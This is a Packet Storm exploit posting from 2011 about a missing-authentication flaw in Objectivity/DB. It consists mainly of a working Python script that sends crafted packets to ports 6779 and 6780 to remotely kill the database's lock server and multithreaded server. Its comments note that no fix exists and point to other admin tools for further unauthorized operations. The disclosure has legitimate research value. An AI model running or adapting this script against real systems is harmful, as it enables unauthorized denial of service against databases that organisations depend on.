Objectivity/DB Lack Of Authentication

2011-01-14T00:00:00
ID PACKETSTORM:97538
Type packetstorm
Reporter Jeremy Brown
Modified 2011-01-14T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# obj.py  
# Objectivity/DB Lack of Authentication Remote Exploit  
# Jeremy Brown [0xjbrown41-gmail-com]  
# Jan 2011  
#  
# "Objectivity, Inc. is a leader in distributed, scalable database technology.  
# Our patented data management engine and persistent object store is the enabling  
# technology powering some of the most complex applications and mission critical  
# systems used in government, business and science organizations today."  
#  
# Objectivity/DB includes many different tools for administration. The  
# problem is, anyone can use these tools to perform operations on the host  
# running the lock server, advanced multithreaded server, and probably  
# it's other servers as well, without any authentication. This design flaw  
# puts the host running these servers at risk of potentially unauthorized  
# operations being performed on the system, locally or remotely.  
#  
# This code demostrates a couple of the easiest operations to replicate  
# by hand, like killing the lock and am servers. The suite contains lots  
# of other admin tools that do various, more interesting tasks with the  
# Objectivity/DB, such as oobackup, oonewfd, oodeletefd, oodebug, etc...  
#  
# Tested on Objectivity/DB 10 running on Windows  
#  
# Fixed version: N/A, US-CERT coordinated the communication and released  
# a vulnerability note after the vendor did not provide additional feedback.  
#  
# http://www.kb.cert.org/vuls/id/782567  
#  
  
import sys  
import socket  
  
kill_ooams=(  
"\x0d\x03"+  
"\x00"*5+  
"\x02"+  
"\x00"*3+  
"\x19\xf0\x92\xed\x89\xf4\xe8\x95\x43\x03"+  
"\x00"*15+  
"\x61\x62\x63"+  
"\x00"+  
"\x31\x32\x33\x34"+  
"\x00"*3+  
"\x05\x8c"+  
"\x00"*3+  
"\x0d"+  
"\x00"*4  
)  
  
kill_ools=(  
"\x0d\x03"+  
"\x00"*5+  
"\x77"+  
"\x00"*3+  
"\x04\xad\xc4\xae\xda\x9e\x48\xd6\x44\x03"+  
"\x00"*15  
)  
  
if len(sys.argv)<3:  
print "Objectivity/DB Remote Exploit"  
print "Usage: %s <target> <operation>"%sys.argv[0]  
print "\nWhat would you like to do?\n"  
print "[1] Kill the advanced multithreaded server"  
print "[2] Kill the lock server"  
print "For other operations, check out oobackup, oodebug, etc"  
sys.exit(0)  
  
target=sys.argv[1]  
op=int(sys.argv[2])  
  
if((op<1)|(op>2)):  
print "Invalid operation"  
sys.exit(1)  
  
if(op==1):  
port=6779  
data=kill_ooams  
  
if(op==2):  
port=6780  
data=kill_ools  
  
cs=target,port  
  
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
sock.connect(cs)  
  
sock.send(data)  
  
sock.close()  
`